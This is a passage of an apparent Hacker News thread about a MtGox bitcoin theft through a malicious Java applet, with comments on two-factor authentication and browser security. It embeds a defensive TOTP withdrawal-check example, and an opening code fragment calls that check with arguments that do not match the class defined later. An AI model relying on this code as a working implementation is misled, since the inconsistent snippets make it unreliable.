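    code = totp(RFC_SECRET, time.time())
    print(gate.withdraw(session, 34, "1Example", code))      # True: fresh code from a second device
    print(gate.withdraw(session, 34, "1Example", code))      # False: same code replayed
```

The gate adds what the victim's setup lacked: a secret that never touches the compromised browser, a replay check on the counter, and a short acceptance window. Malware riding the live session can still submit the form, but without the current code the request is refused.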

~~~
zwily
"Oh come on, how hard is it for MtGox to implement TOTP and tell users to
download Google Authenticator?"

Not hard, and they did it a long time ago. The user didn't opt in.

~~~
axefrog
When I signed up for an account, there was no obvious prompting to go and turn
it on. It's all well and good having extra security, but if you don't actively
try to get your users to make use of it, it's only going to be marginally
useful.

~~~
DanBC
That user was aware of extra MtGox security and chose not to use it.

On top of that the user

1) Chose to turn off (or not use) malware software

2) Enabled Java in the browser

3) Chose to visit a short url link presented in a chat window

4) Clicked through a big scary warning

All while still logged into their MtGox account.

It sucks that they're a victim of crime, but their actions were dumb.

------
Tarilo
This is exactly why everyone on the internet keeps saying that you shouldn't
automatically run Java applets or shouldn't have Java installed at all on your
computer.

Java is just such a big target for hackers nowadays, that there will always be
zero-days.

~~~
teraflop
The funny thing is, this particular attack doesn't even involve a Java
vulnerability. You have to either specifically grant the applet elevated
permissions (giving it full access to your computer) or download and run
something that claims to be a "Java updater" from the "g2f.nl" domain.

~~~
tocomment
What I'm not getting is how a running executable can log into a website and
initiate a transaction. It won't have your password right? Or is it just a
keylogger to catch your password?

~~~
dariopy
Like your regular XSRF, it relies on the user already being logged in on some
browser tab.

It probably has a keylogger too.

------
plg
I'm having trouble understanding the OP's problem with mt. gox. Is it that the
OP wants mt. gox to have somehow prevented him from downloading and running
malicious java code from some other third party website? (WTF dude) or is it
more specific, that the OP thinks mt. gox should have somehow prevented the
OP's credentials from being sniffed by said malicious program?

------
0x0
This is probably not much different from any other internet banking trojan
horse delivered via a java exploit.

Some banks solve this problem by requiring a 2 factor auth to confirm
transactions (even after logging in).

------
niggler
Best comment from the thread: "Friends don't let friends use Windows +
Bitcoin."

------
jes5199
The non-reversibility of bitcoin transactions is a huge liability. Our current
state of software technology was designed in a world where the most
valuable/dangerous thing you could possibly have on your disk or on a web site
was, what, your ssh keys? Nude photos of yourself?

The value of hacking, phishing, etc is significantly increased by the presence
of bitcoins.

I guess you could argue that if bitcoins are popular, software practices will
evolve to be much more secure - but until then, it's wild west, and much more
wild than the internet ever was before.

------
willvarfar
Is there a way that MtGox or somewhere could keep a blacklist of 'stolen'
coins? So that they become worthless because nobody would be able to trade
them?

~~~
bonzoesc
Without making that database universal it just means some poor merchant that
accepts bitcoins is going to get stiffed.

~~~
willvarfar
But it'd be viral, so it would be universal. Merchants and absolutely everyone
would all quickly start checking just to ensure they don't get coins they can't
trade, making it effectively universal.

Which means it comes down to convincing the gatekeeper that you were burgled.
But that's a human level problem.

~~~
chii
and whoever that controlled that list would basically control bitcoins,
because they could charge a levy or else they'd put your bitcoin into that
list.

~~~
bonzoesc
Yup, way to put a centralized control on your decentralized "currency."

------
halcyondaze
No offense to bitcoiners, but what are people expecting when the biggest
exchange is "Magic The Gathering Online Exchange" for this "currency" ?

------
Tomdarkness
I've not used Mt.Gox but does it let you perform transactions without
authenticating again? Even if you were logged in to your account, I'd expect
any kind of financial related website to perform some kind of
re-authentication before processing any transaction. Perhaps with the
exception of transferring funds to somewhere you've sent funds in the past.

~~~
wting
You have the option of enabling two-factor authentication for various actions:

<http://i.imgur.com/5I31WcX.png>

------
wereHamster
"site is loaded with a java script" - srsly? You do ebanking (or ebitcoining)
on a computer which has java installed?

~~~
Intermernet
I hate to say it, but (at least in Australia) many banks require Java to do
business banking.

This should change (at the glacial rate banks change things) as they realise
that Java in the browser is risky business.

This may change if Oracle pull their finger out, stop being dicks about the
licensing, and try to promote the language again.

Honestly, I think they've left it too late and the majority of "Java" you're
going to see in the near future is going to be related to Android (and hence
not running on Oracle's stack).

~~~
wereHamster
Then at least have a virtual machine snapshot of a clean install of
OS+Java+Browser and always boot from the snapshot when doing internet
business.

------
smoyer
Java Applets were designed to give you the ability to execute a program on
your computer from the browser in much the same way ActiveX controls _could_
be used for exploits. Turn off Java in the browser and hope that JavaScript is
sandboxed well enough.

~~~
ww520
Java Applets are not designed to give you the ability to execute a program on
your computer from the browser in much the same way ActiveX controls could be
used for exploits.

Only a signed Java applet can ask the user to give permission to access his
computer.

------
egeozcan
I quite like the JVM but I think it should be stopped from running inside a
browser.

~~~
Tarilo
The thing is that it's easy to stop Java applets from executing. Even better,
most browsers prevent this by default. Including Chrome, which he was probably
using as indicated by the screenshot.

Looks like this was entirely his own fault, though it still sucks. Wouldn't
hope for a refund though t.b.h.

~~~
egeozcan
Yes, I guess you're right. Am I being evil when I think that it would have
been great if we could publish security patches for humans? =)

------
dan1234
Doesn't Mt.Gox have any 2 factor auth when it comes to approving transfers?

~~~
Jach
Yup, they use yubikey and in the past have even given free devices to
customers. This guy didn't have one, which is simply irresponsible on his
part.

~~~
tlrobinson
They also support TOTP (Google Authenticator, etc)

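The per-withdrawal second factor that several comments here ask about (confirming each transfer with a TOTP code, not just the login) can be illustrated with the following added example. It is not MtGox's code or anything from this thread: it implements RFC 6238 TOTP over a demo secret (the RFC's own test-vector secret, base32-encoded) and a hypothetical `WithdrawalGate` that refuses a withdrawal on session alone and accepts each code only once, so a sniffed session or a replayed code does not move funds.

```python
import base64
import hashlib
import hmac
import struct

# Demo secret: the RFC 6238 test-vector key "12345678901234567890" in base32.
# It is a published example value, not a real credential.
DEMO_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
STEP = 30      # RFC 6238 time step in seconds
DIGITS = 6     # code length a typical authenticator app shows


def totp(secret_b32: str, unix_time: float, step: int = STEP, digits: int = DIGITS) -> str:
    """RFC 6238 TOTP: HOTP (RFC 4226, HMAC-SHA1) over the current time counter."""
    key = base64.b32decode(secret_b32.upper())
    counter = int(unix_time) // step
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


class WithdrawalGate:
    """Hypothetical step-up check: a logged-in session alone cannot move funds.

    Every withdrawal needs a fresh code from the second factor, and each
    time-step counter is consumed at most once, so a trojan that sniffs the
    session cookie, or even one code, cannot replay it for another withdrawal.
    """

    def __init__(self, secret_b32: str, window: int = 1):
        self.secret = secret_b32
        self.window = window        # tolerate +/- this many steps of clock skew
        self.last_counter = -1      # highest counter already consumed

    def withdraw(self, session_valid: bool, code: str, now: float) -> bool:
        if not session_valid:
            return False
        base = int(now) // STEP
        for counter in range(base - self.window, base + self.window + 1):
            if counter <= self.last_counter:
                continue            # already used: a replayed code is refused
            expected = totp(self.secret, counter * STEP)
            if hmac.compare_digest(expected, code):
                self.last_counter = counter
                return True
        return False                # wrong or stale code: no withdrawal
```
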
------
DanBC
At $200 per bitcoin, this is a $6,800 lesson in "Don't visit random websites".

At least they were open about being robbed. I wonder how many bitcoins were
stolen in total?

EDIT: Has anyone visited the URL to analyse the malware?

~~~
nkvoll
At the current exchange rate, his loss is now down to $2100...

------
dariopy
Maybe I'm missing something, but where exactly is the exploit here? (0-day no
less)

AFAIU, the user was prompted to accept an autosigned applet, and he did so.
After that, the outcome was inevitable. You may hate java all you like, but it
seems like the user (inadvertently) gave this program permission to steal all
his money.

------
parandroid
Actually, the only thing the hacker didn't do is ask the dude politely to give
him (or her) the money. This wasn't a 0day bug, no XSS. The dude gave the
hacker permission to run any code on his machine, therefore it's completely
his own fault, and has nothing to do with MtGox.

------
oomkiller
I uninstalled all of the Java plugins when the 0-days started coming out a
couple months ago. If you want to be extra safe, you should probably have some
sort of Linux LiveCD without any plugins enabled, that acts as a trusted
environment for banking.

------
supjeff
Why do people trust MtGox again? Didn't something similar to this happen a
year or so ago where everyone's money disappeared and the ops were like "Yeah
we don't know what happened"? How do we know they aren't fleecing everyone?

------
Osiris
I have a Yubikey account with MtGox. Withdrawals require a long-press of the
key. If you have a significant amount of BTC in MtGox, I would recommend
paying the $20 to get the two-factor authentication key for your account.

------
ghshephard
This makes a lot more sense now:

<https://news.ycombinator.com/item?id=5530247>

------
pan69
Doesn't MtGox send out an email or SMS with a verification code before a
transfer can take place? Ouch...

------
stesch
I get laughed at for using NoScript.

~~~
ben0x539
I use NoScript too, but the OP was led to believe that they were accessing a
video or an interactive chat, so they would likely have permitted scripts to
run on that page anyway.

------
onbitcoins
<http://onbitcoins.com/2013/04/11/bitcoin-theft-mt-gox-trust/>

A Mt. Gox investor was surprised to see his account suddenly pillaged. Will
Bitcoin theft call into question trust and confidence in the system?

------
danmaz74
Welcome to the far west...

------
drivebyacct2
Man, I'm getting tired of repeating these basic security issues:

Stop storing your wallet online. And if not that, _stop letting flash/java
autoload/run_. Both Chrome and Firefox have "click-to-enable". Not only is it
more secure, it also prevents auto-video-playing, background audio you can't
find and shit like this from happening.

------
Jebbers
LOLarious.

